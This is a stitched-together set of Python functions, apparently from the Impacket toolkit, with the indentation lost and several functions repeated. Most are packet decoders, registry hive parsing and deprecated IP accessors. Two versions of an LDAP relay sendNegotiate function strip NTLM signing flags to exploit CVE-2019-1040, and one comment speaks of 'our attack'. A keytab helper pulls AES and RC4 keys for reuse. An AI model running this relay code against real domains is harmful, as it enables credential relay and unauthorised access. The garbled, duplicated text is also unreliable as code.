def decode(self, aBuffer):
i = ImpactPacket.IP(aBuffer)
self.set_decoded_protocol ( i )
off = i.get_header_size()
end = i.get_ip_len()
# If ip_len == 0 we might be facing TCP segmentation offload, let's calculate the right len
if end == 0:
LOG.warning('IP len reported as 0, most probably because of TCP segmentation offload. Attempting to fix its size')
i.set_ip_len(len(aBuffer))
end = i.get_ip_len()
if i.get_ip_p() == ImpactPacket.UDP.protocol:
self.udp_decoder = UDPDecoder()
packet = self.udp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.TCP.protocol:
self.tcp_decoder = TCPDecoder()
packet = self.tcp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.ICMP.protocol:
self.icmp_decoder = ICMPDecoder()
packet = self.icmp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.IGMP.protocol:
self.igmp_decoder = IGMPDecoder()
packet = self.igmp_decoder.decode(aBuffer[off:end])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:end])
i.contains(packet)
return i
def decode(self, aBuffer):
i = ImpactPacket.IP(aBuffer)
self.set_decoded_protocol ( i )
off = i.get_header_size()
end = i.get_ip_len()
# If ip_len == 0 we might be facing TCP segmentation offload, let's calculate the right len
if end == 0:
LOG.warning('IP len reported as 0, most probably because of TCP segmentation offload. Attempting to fix its size')
i.set_ip_len(len(aBuffer))
end = i.get_ip_len()
if i.get_ip_p() == ImpactPacket.UDP.protocol:
self.udp_decoder = UDPDecoder()
packet = self.udp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.TCP.protocol:
self.tcp_decoder = TCPDecoder()
packet = self.tcp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.ICMP.protocol:
self.icmp_decoder = ICMPDecoder()
packet = self.icmp_decoder.decode(aBuffer[off:end])
elif i.get_ip_p() == ImpactPacket.IGMP.protocol:
self.igmp_decoder = IGMPDecoder()
packet = self.igmp_decoder.decode(aBuffer[off:end])
else:
self.data_decoder = DataDecoder()
packet = self.data_decoder.decode(aBuffer[off:end])
i.contains(packet)
return i
def sendNegotiate(self, negotiateMessage):
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# When exploiting CVE-2019-1040, remove message signing flag
# For SMB->LDAP this is required otherwise it triggers LDAP signing
# Changing flags breaks the signature unless the client uses a non-standard implementation of NTLM
if self.serverConfig.remove_mic:
if negoMessage[
'flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage[
'flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
self.negotiateMessage = negoMessage.getData()
# Warn if the relayed target requests signing, which will break our attack
if negoMessage[
'flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
LOG.warning(
'The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)'
)
with self.session.connection_lock:
if not self.session.sasl_in_progress:
self.session.sasl_in_progress = True
request = bind.bind_operation(self.session.version,
'SICILY_PACKAGE_DISCOVERY')
response = self.session.post_send_single_response(
self.session.send('bindRequest', request, None))
result = response[0]
try:
sicily_packages = result['server_creds'].decode(
'ascii').split(';')
except KeyError:
raise LDAPRelayClientException(
'Could not discover authentication methods, server replied: %s'
% result)
if 'NTLM' in sicily_packages: # NTLM available on server
request = bind.bind_operation(self.session.version,
'SICILY_NEGOTIATE_NTLM',
self)
response = self.session.post_send_single_response(
self.session.send('bindRequest', request, None))
result = response[0]
if result['result'] == RESULT_SUCCESS:
challenge = NTLMAuthChallenge()
challenge.fromString(result['server_creds'])
return challenge
else:
raise LDAPRelayClientException(
'Server did not offer NTLM authentication!')
def loadKeysFromKeytab(cls, fileName, username, domain, options):
keytab = Keytab.loadFile(fileName)
keyblock = keytab.getKey("%s@%s" % (username, domain))
if keyblock:
if keyblock["keytype"] == Enctype.AES256.value or keyblock[
"keytype"] == Enctype.AES128.value:
options.aesKey = keyblock.hexlifiedValue()
elif keyblock["keytype"] == Enctype.RC4.value:
options.hashes = ':' + keyblock.hexlifiedValue().decode(
'ascii')
else:
LOG.warning("No matching key for SPN '%s' in given keytab found!",
username)
def __init__(self, hive, isRemote = False):
self.__hive = hive
if isRemote is True:
self.fd = self.__hive
self.__hive.open()
else:
self.fd = open(hive,'rb')
data = self.fd.read(4096)
self.__regf = REG_REGF(data)
self.indent = ''
self.rootKey = self.__findRootKey()
if self.rootKey is None:
LOG.error("Can't find root key!")
elif self.__regf['MajorVersion'] != 1 and self.__regf['MinorVersion'] > 5:
LOG.warning("Unsupported version (%d.%d) - things might not work!" % (self.__regf['MajorVersion'], self.__regf['MinorVersion']))
def __init__(self, hive, isRemote = False):
self.__hive = hive
if isRemote is True:
self.fd = self.__hive
self.__hive.open()
else:
self.fd = open(hive,'rb')
data = self.fd.read(4096)
self.__regf = REG_REGF(data)
self.indent = ''
self.rootKey = self.__findRootKey()
if self.rootKey is None:
LOG.error("Can't find root key!")
elif self.__regf['MajorVersion'] != 1 and self.__regf['MinorVersion'] > 5:
LOG.warning("Unsupported version (%d.%d) - things might not work!" % (self.__regf['MajorVersion'], self.__regf['MinorVersion']))
def sendNegotiate(self, negotiateMessage):
# Remove the message signing flag
# For LDAP this is required otherwise it triggers LDAP signing
# Note that this code is commented out because changing flags breaks the signature
# unless the client uses a non-standard implementation of NTLM
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
#negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
self.negotiateMessage = negoMessage.getData()
# Warn if the relayed target requests signing, which will break our attack
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
LOG.warning('The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)')
with self.session.connection_lock:
if not self.session.sasl_in_progress:
self.session.sasl_in_progress = True
request = bind.bind_operation(self.session.version, 'SICILY_PACKAGE_DISCOVERY')
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
try:
sicily_packages = result['server_creds'].decode('ascii').split(';')
except KeyError:
raise LDAPRelayClientException('Could not discover authentication methods, server replied: %s' % result)
if 'NTLM' in sicily_packages: # NTLM available on server
request = bind.bind_operation(self.session.version, 'SICILY_NEGOTIATE_NTLM', self)
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
if result['result'] == RESULT_SUCCESS:
challenge = NTLMAuthChallenge()
challenge.fromString(result['server_creds'])
return challenge
else:
raise LDAPRelayClientException('Server did not offer NTLM authentication!')
def set_source_address(self, source_address):
LOG.warning('deprecated soon')
self.set_ip_src(source_address)
def set_destination_address(self, destination_address):
LOG.warning('deprecated soon')
self.set_ip_dst(destination_address)
def set_source_address(self, source_address):
LOG.warning('deprecated soon')
self.set_ip_src(source_address)
def set_protocol_version(self, version):
LOG.warning('deprecated soon')
self.set_ip_v(version)
def get_destination_address(self):
LOG.warning('deprecated soon')
return self.get_ip_dst()
def get_source_address(self):
LOG.warning('deprecated soon')
return self.get_ip_src()
def get_protocol_version(self):
LOG.warning('deprecated soon')
return self.get_ip_v()
def set_destination_address(self, destination_address):
LOG.warning('deprecated soon')
self.set_ip_dst(destination_address)
def set_protocol_version(self, version):
LOG.warning('deprecated soon')
self.set_ip_v(version)
def get_destination_address(self):
LOG.warning('deprecated soon')
return self.get_ip_dst()
def get_source_address(self):
LOG.warning('deprecated soon')
return self.get_ip_src()
def get_protocol_version(self):
LOG.warning('deprecated soon')
return self.get_ip_v()